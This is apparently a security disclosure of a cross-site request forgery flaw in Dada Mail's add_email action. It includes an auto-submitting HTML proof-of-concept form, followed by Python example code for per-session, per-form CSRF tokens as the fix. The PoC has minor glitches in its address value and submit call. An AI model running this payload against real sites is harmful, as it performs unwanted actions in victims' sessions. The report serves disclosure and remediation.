Cross-Site Request Forgery (CSRF) in justingit/dada-mail
Sep 12th 2021
An attacker is able to add any number of subscribers to a list through a CSRF attack.

In a CSRF attack the victim only needs to be logged into your application and then visit a malicious website; from there a single redirection or auto-submitted form lets the attacker hit an unprotected endpoint. In other words, merely visiting a site causes an unwanted action to be performed in the victim's session, without the user being aware of it.

Likewise, a low-privilege user can send a link to other users or to admins with higher privileges, and the malicious request embedded in it will be executed with the victim's privileges, without the victim users or admins noticing.
Proof of Concept

1. First, an admin or a user with the required privileges must already be logged in to the application in any browser.
2. Open PoC.html (it auto-submits the form).
3. A subscriber with the email address firstname.lastname@example.org will be added once the PoC.html file has been opened.
```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://dadademo.com/cgi-bin/dada/mail.cgi" method="POST">
      <input type="hidden" name="flavor" value="add_email" />
      <input type="hidden" name="type" value="list" />
      <input type="hidden" name="return_to" value="" />
      <input type="hidden" name="return_address" value="" />
      <input type="hidden" name="not_members_fields_options_mode" value="preserve_if_defined" />
      <input type="hidden" name="address" value=""email@example.com",""" />
      <input type="hidden" name="process" value="Subscribe/Update Checked Addresses ⇒" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms.submit();
    </script>
  </body>
</html>
```
This PoC performs the action without the user noticing. It can also send multiple requests at the same time (for example by loading several iframes), so an attacker can repeat or brute-force any unprotected action in bulk.

This vulnerability can cause medium damage to the availability and integrity of the system.

You should set a CSRF token for each user/form and verify it server-side before processing state-changing requests such as flavor=add_email.
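As an added illustration of the recommended fix (this is example code written for this report, not Dada Mail's own Perl code), the handler below derives a token bound to both the logged-in session and the specific form, embeds it in the form that only the authenticated user can fetch, and rejects any add_email submission that does not carry a matching token. A cross-site page such as the PoC cannot read the token because the same-origin policy stops it from reading the victim's form page, so its auto-submitted POST is refused. The session store, form names and handler signatures are assumptions for the example.

```python
import hashlib
import hmac
import secrets

# Constructed in-memory session store: session_id -> per-session secret.
# A real application would keep this secret inside its existing server-side session.
SESSIONS = {}


def start_session():
    """Create a logged-in session and give it a fresh random secret."""
    session_id = secrets.token_hex(16)
    SESSIONS[session_id] = secrets.token_bytes(32)
    return session_id


def csrf_token(session_id, form_name):
    """Derive a token bound to this user's session AND this particular form.

    Using HMAC over the form name with a per-session secret gives a distinct
    token per user/form without storing one token per form on the server.
    """
    secret = SESSIONS[session_id]
    return hmac.new(secret, form_name.encode(), hashlib.sha256).hexdigest()


def render_add_email_form(session_id):
    """Return the HTML form served to the authenticated user, with the token embedded."""
    token = csrf_token(session_id, "add_email")
    return (
        '<form action="/cgi-bin/dada/mail.cgi" method="POST">\n'
        '  <input type="hidden" name="flavor" value="add_email" />\n'
        f'  <input type="hidden" name="csrf_token" value="{token}" />\n'
        '  <input type="text" name="address" />\n'
        '  <input type="submit" name="process" value="Subscribe" />\n'
        '</form>'
    )


def handle_add_email(session_id, form):
    """Server-side handler for flavor=add_email.

    `form` is the dict of posted fields. Returns (status_code, message).
    The token check happens before any subscriber is touched.
    """
    if session_id not in SESSIONS:
        return 401, "not logged in"
    expected = csrf_token(session_id, "add_email")
    supplied = form.get("csrf_token", "")
    # Constant-time comparison so the check does not leak the token byte by byte.
    if not hmac.compare_digest(supplied, expected):
        return 403, "CSRF token missing or invalid; subscriber not added"
    address = form.get("address", "").strip()
    if not address:
        return 400, "no address supplied"
    # Only reached with a valid token: this is where the real subscribe logic would run.
    return 200, f"subscribed {address}"


if __name__ == "__main__":
    sid = start_session()
    # A request shaped like the PoC (no token) is rejected.
    print(handle_add_email(sid, {"flavor": "add_email", "address": "email@example.com"}))
    # A request from the legitimately served form carries the token and succeeds.
    tok = csrf_token(sid, "add_email")
    print(handle_add_email(sid, {"address": "email@example.com", "csrf_token": tok}))
```

Because the token is derived per session and per form, a token captured for one form is useless for another, and it becomes invalid as soon as the session (and its secret) is discarded. Marking the session cookie `SameSite=Lax` or `Strict` is a useful second layer, but the server-side token check is what actually closes this report.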